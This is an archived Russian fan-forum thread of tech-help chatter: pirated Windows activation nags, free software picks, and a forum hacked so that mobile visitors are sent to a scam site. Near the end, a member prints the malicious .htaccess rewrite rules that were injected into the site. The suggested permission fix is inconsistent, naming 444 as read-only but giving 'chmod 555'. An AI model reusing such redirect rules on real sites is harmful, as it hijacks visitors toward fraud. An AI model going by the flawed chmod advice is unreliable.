Помощь - Поиск - Пользователи - Календарь
Полная версия: Интернет. Программы. Решение проблем.
The Cranberries In Your Head > Общение > Беседка
Страницы: 1, 2, 3, 4, 5, 6, 7, 8
Карп
Да, правильно понял!
Astronom
1 скан на вирусы
2 скан на вирусы и
(если система - Хрень ПРО)
http://otvet.mail.ru/question/27258593/
3 Если система не Хрень ПРО, а Домашняя Хрень, то только вирус.
Карп
Короче задолбал победил меня этот вирус.
Взял новый HDD и поставил Семёрку. Прости ЭксПи:(
Только Винда, ессно пиратская и просится активировать её, как при каждом включении, так и периодически во время работы консолька выскакивает:( Это можно как-нибудь побороть? Меня не особо напрягает, но мучает мысль, что в один прекрасный момент она откажется запускаться. А я в неё уже кучу полезный прог установлю и инфы набью под завязку...
А ещё в правом нижнем углу постоянно находится надпись "Ваша копия Windows не является подлинно". Автоматическое обновление, ессно отключил сразу.
Astronom
скачай купи нормально активированную семерку ninja.gif
jv11
Фильм ужасов Sims http://www.youtube.com/watch?feature=playe...d&v=Ya_1sMmGD-8 crazy.gif mySm8.gif
Astronom
шозадерьмо? blink.gif
jv11
Sims ninja.gif crazy.gif
Настасья
Цитата(jv11 @ 25.4.2012, 22:02) *

ахахаах))))) кто играл - тот поймет))))))
jv11
Типичный студент - http://www.youtube.com/watch?feature=playe...&v=7sFbVGY1nRA#!

crazy.gif mySm8.gif
Настасья
mySm13.gif
дополню - типичный иногородний студент;)
jv11
Как бы выглядел наш мир, если бы Интернет существовал уже тысячи лет?
http://www.videosostav.ru/video/af1af0c15f...eb790c56a89c7e/

mySm8.gif mySm8.gif mySm8.gif
Настасья
mySm8.gif
cran chick
написала,а уже всё само починилось) (не знаю как сообщение удалить,поэтому так)
jv11
Возник вопрос...

Я сейчас озадачен тем, что нашпиговываю новый комп разными ништяками. Влом заморачиваться всякими пиратскими версиями раскрученных программ и кряками, поэтому как настоящий нищеброд устанавливаю все бесплатное. mySm8.gif crazy.gif

Приятным открытием для меня стали программы из набора OpenOffice.org – ничем не хуже Майкрософт Офис! OpenOffice.org Writer вообще уделывает Word. mySm13.gif

Но вопрос, собственно, не в этом... twisted.gif

Кто-нибудь может посоветовать бесплатный графический редактор а-ля Фотошоп, но только не такой навороченный (мне в Фотошопе 90% функций нафиг не сдались). Ну чтобы можно было по минимуму шаманить с картинками и фотками, ну и сприятным интерфейсом. Paint не предлагать. mySm8.gif

Заранее спасибо! smile.gif
Axusha
Цитата(jv11 @ 21.12.2012, 17:14) *

Кто-нибудь может посоветовать бесплатный графический редактор а-ля Фотошоп, но только не такой навороченный (мне в Фотошопе 90% функций нафиг не сдались). Ну чтобы можно было по минимуму шаманить с картинками и фотками, ну и сприятным интерфейсом. Paint не предлагать. mySm8.gif

Заранее спасибо! smile.gif

во. присоединяюсь к вопросу mySm8.gif
jv11
Покопался на форумах. Народ советует этот -- http://www.gimpshop.com/ Типа нищебродский Фотошоп. mySm8.gif Попробуем. cool.gif
Astronom
под Виндой кошерен Paint.NET
ninja.gif

gimp - это, все-таки, для бородатых линуксоидов
jv11
thanks.gif Ща почитаем, чо это за зверь такой. twisted.gif
jv11
в итоге установил вот эту -- http://www.artweaver.de/ mySm8.gif crazy.gif

похожа на одну из древних версий Фотошопа, но мне больше и не надо crazy.gif
Deminak
Что так сразу для линуксоидов?
У меня gimp, open office и vlc-плеер, но с линуксом возится желания ни разу не возникало, а вышеперечисленные прогрмаммы очень даже неплохие.
jv11
У меня тоже VLC! mySm13.gif VLC рулит. twisted.gif
Maniak-N
Цитата(jv11 @ 21.12.2012, 17:14) *

Приятным открытием для меня стали программы из набора OpenOffice.org – ничем не хуже Майкрософт Офис! OpenOffice.org Writer вообще уделывает Word. mySm13.gif

У меня в универе на ВЦ ОпенОфис стоит. crazy.gif
Как говорится, если нет разницы, зачем платить больше. Нажмите для просмотра прикрепленного файла
Astronom
Цитата(Deminak @ 21.12.2012, 21:39) *

Что так сразу для линуксоидов?

потому что это - GNU Image Manipulation Program
Wallace
Юра, из бесплатных граф.редакторов советую посмотреть на PixBuilder - полностью бесплатный, весит мало, шевелится быстро, слои поддерживает и т.п.
Artweaver дома вечером посмотрю для сравнения, на работе нет админских прав - не ставится даже Free...
jv11
спасибо, Костя. пока Artweaver со своей задачей вроде справляется. smile.gif
Wallace
Да, мне Artweaver тоже "фотошопнее", чем PixBuilder, показался... mySm13.gif
jv11
И еще один ламерский вопрос! crazy.gif mySm8.gif

Посоветуйте, пожалуйста, какую-нибудь бесплатную программу для конвертации медиа-файлов. crazy.gif Ну то есть, чтобы можно было перегонять ФЛАКи во всякие мп3, ави в мп4 и т.п. mySm8.gif До этого мне верой и правдой служил взломанный Тотал Видео Конвертер, но, как я уже говорил, в этот раз я поставил целью нафаршировать комп полностью легальным бесплатным софтом. mySm8.gif

Аудио-файлы может конвертировать JetAudio, но я не хочу устанавливать кучу медиа-проигрывателей, одного VLC вполне хватает.

Заранее спасибо! mySm8.gif

В свою очередь из бесплатных прог хочу порекомендовать архиватор 7-Zip. mySm13.gif ВинРар нах теперь не нужен. mySm13.gif
Astronom
ты хочешь сконвертировать аудиофайл (ФЛАК) в видеофайл (ави, мп4 и пр)? blink.gif
если надо перегнать один аудиофайл (тот же флак) в другой аудиоформат (предположим, мп3 92 кбит ради СТРАДАНИЙ), то таких программ куча, например, есть комбайн AIMP, он полегче JetAudio и раньше там можно было скачать отдельно аудио конвертер, но теперь, похоже, все идет одним куском. В общем, прог дофига и вообще, ставь линукс crazy.gif

раз уж мы тут про бесплатный софт, то у Винды уже есть свой родной антивирь. И он даже работает twisted.gif
jv11
Цитата(Astronom @ 27.12.2012, 12:43) *

ты хочешь сконвертировать аудиофайл (ФЛАК) в видеофайл (ави, мп4 и пр)? blink.gif

Нет, этого не я хочу. mySm8.gif Но вот Тотал Видео Конвертер умел вытягивать аудио из любого видеофайла и тут же конвертировать его во флак, мп3 и прочие аудиоформаты. Эта функция очень даже полезная. mySm13.gif AIMP это умеет? twisted.gif
Astronom
не, это же аудиоконвертер, а не содомит россии ninja.gif
Смеагол

Цитата
И еще один ламерский вопрос!

Я в этом случае пользуюсь Format Factory - удобная херь. Насчёт бесплатности понятия не имею, но я точно за неё не платил )
jv11
О, я как раз читал сейчас про Format Factory. mySm8.gif Да, она вроде бесплатная. Валентин, а она умеет вытягивать аудио из видео-файлов? И как там насчет конвертации ФЛАК в мп3? На педивикии в статье про прогу про флак почему-то вообще не упоминается. ninja.gif
Смеагол
Флак вроде может, а вот аудио из видео понятия не имею, попробую сейчас разобраться, но для этих целей я бы тебе советовал SoundRec ,очень проста в использовании - просто включаешь проигрыватель с фильмом,или музыкой и в нужный момент нажимаешь на запись в СаундРеке.Правда он записывает на формате Wave,но качество записи всегда отменное, мне даже казалось порой лучшее,чем в первоисточнике)
Смеагол
smile.gif Не нашел я там опции записи аудио из видео (правда это не означает,что её там нет rolleyes.gif ) .Ещё плюс ФорматФактори в том ,что можно увеличить децибелы при переформатировании. Я иногдасмотрел фильмы на телефоне, так вот тихий звук видео файлов очень бесил. То есть звук был нормальный, но в автобусе всё равно нихера не слышно, а так увеличил громкость и норм.
jv11
Ага, спасибо! Буду иметь в виду. twisted.gif
Maniak-N
Цитата(Astronom @ 27.12.2012, 13:43) *

и вообще, ставь линукс crazy.gif

Нажмите для просмотра прикрепленного файла Нажмите для просмотра прикрепленного файла Нажмите для просмотра прикрепленного файла
Цитата(Astronom @ 27.12.2012, 13:43) *

Кстати, раз уж речь про Винду. Раньше с сайта Майкрософта можно было скачать дистрибутивы Винды. А теперь они их выпилили чтоле? blink.gif Нажмите для просмотра прикрепленного файла

P.S. Я для вытаскивания аудио из видео пользуюсь MediaCoder'ом. Только он глючный какой-то немного. crazy.gif И я не помню бесплатный он или нет. И самое главное, что он вряд ли переконвертирует тебе мр3 из ФЛАКа. crazy.gif
Настасья
это, скорее, в тему про мобильники, но и сюда пойдет.
такая проблема: когда пытаюсь зайти с мобильника (андроид) на наш форум, меня автоматически перенаправляют на какой-то левый сайт pdaget.com/...........
пишут, что мне надо обновить FLV плеер, он устарел (хотя на мобильнике у меня его, естесственно, нет). для этого пройти по ссылке, скачать какой-то установочный файл, запустить и т.д.. в инете пишут, что при скачивании и установки мобильник сам отправляет какую-то смс и снимается бабло. короче развод.
есть идеи, как от это херни избавиться?? на другие сайты захожу без проблем (пока), проблема тока с форумом... на вирусы мобилу проверила, вроде всё чисто.
в инете про эту хрень пишут, например, тут: http://allsetting.ru/virus-attack/
но чё сне сделать, чтобы эта хрень не вылезала и с мобильника форум снова открывался??
и, я так понимаю, возможно дело не в мобильнике, а в самом форуме?
Смеагол
попробуй оперу мини.это я так, пальцем в небо)
Geenay
pdaget.com не имеет к Adobe никакого отношения.
100% это мошенники.
Обратись к представителям своего оператора. Ведь это они должны блокировать такую хрень.
Astronom
если это началось только сегодня, то могли и ломануть форум.
Если давно, то заражен мобильник.
Его надо расчленить и сжечь. mySm14.gif
Djambulad West
У меня такая же фигня на айпэде, перенаправляет в айтюнс на программу "Литрес". Интересно, что сделать с этим?
Astronom
Самое первое - надо проверить файл .htaccess
в корне форума.
Конкретнее, дату его последнего изменения (т.к., вчера вход с мобильника на форум работал нормально).

Еще нужно посмотреть на наличие перенаправления на m.extrasoftware в том же файле .htaccess и в сценариях форума.
Geenay
С Nokia Asha 311 не заходит на форум в принципе((((
jv11
У меня та же фигня с мобильника. Будем разбираться.
Axusha
Даааа!!! И мне никак с мобилки не зайти unsure.gif

Цитата(Смеагол @ 7.7.2013, 9:38) *

попробуй оперу мини.это я так, пальцем в небо)

и с оперы не зайти. никак...
jv11
Цитата(Astronom @ 7.7.2013, 15:35) *

в корне форума.

Я правильно понимаю, что для этого нужно войти по ftp в папку форума? crazy.gif Если да, то тогда придется ждать Карпа. crazy.gif Ибо в гламурной админской ничего похожего на .htaccess я пока не нашел. crazy.gif mySm8.gif
Astronom
лучше прямой доступ по SSH, фтп может не показывать файлы, начинающиеся с точки, а может и показывать. Зависит от настроек у хостера.
Карп
Цитата(Astronom @ 7.7.2013, 16:35) *

в корне форума.
Конкретнее, дату его последнего изменения (т.к., вчера вход с мобильника на форум работал нормально).

Еще нужно посмотреть на наличие перенаправления на m.extrasoftware в том же файле .htaccess и в сценариях форума.

Вот, что находится в файле .htaccess -

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} & #33;(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wg
et) [NC]
RewriteRule (.*) h_t_t_p_:_/_/_m.extrasoftware.biz/?29&source=thecranberries.ru [L,R=302] #

А само изменение файла датируется аж 1970 годом:( Я и не родился тогда ещё.
Astronom
Цитата
Вот, что находится в файле .htaccess -

да, это оно и есть
сначала идет перенаправление на m.extrasoftware.biz, а уже оттуда на те сайты, куда всех перенаправляло.

Первым делом надо поменять все пароли доступа по FTP, к админке, по SSH (если есть. Скорее всего, совпадает с паролем доступа по FTP).
Далее
1 если есть резервная копия файла .htaccess, то заменить ею тот файл, который сейчас находится на сайте, ибо его немножко подредактировали ninja.gif
2 Если нет резервной копии этого файла, то это хреново. Лучше либо звать техподдержку, либо пытаться найти хоть какой-то архив со старыми файлами. Например, если сохранился архив, полученный от Dess'а
3 Если есть доступ по SSH (указывается хостером в письме с паролями), то нужно зайти на сервак и проверить права доступа к файлу .htaccess. В идеале должно быть r--r--r-- или 444. Это означает доступ только на чтение для всех пользователей. Также, могут быть более строгие права: r--r----- или совсем уж параноидальное r--------. Это нормально.
Если права как-то отличаются от приведенных, например rwxrwxrwx, rw-rw-rw, rw-r--r-- и т.п., то нужно поменять их на приведенные выше.
Делается это командой
Код
chmod 555 ./.htaccess

Цитата
А само изменение файла датируется аж 1970 годом:(

скорее всего стоит 1 января 1970 года. Это начало эпохи UNIX
Карп
Слушай, я пока въеду во все эти премудрости, пройдёт не одна неделя.
Давай, если есть желание, я тебе пароли по FTP и SSH вышлю. Подшаманишь, если уж на то пошло:)
Только скажи какие и куда слать.
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Invision Power Board © 2001-2025 Invision Power Services, Inc.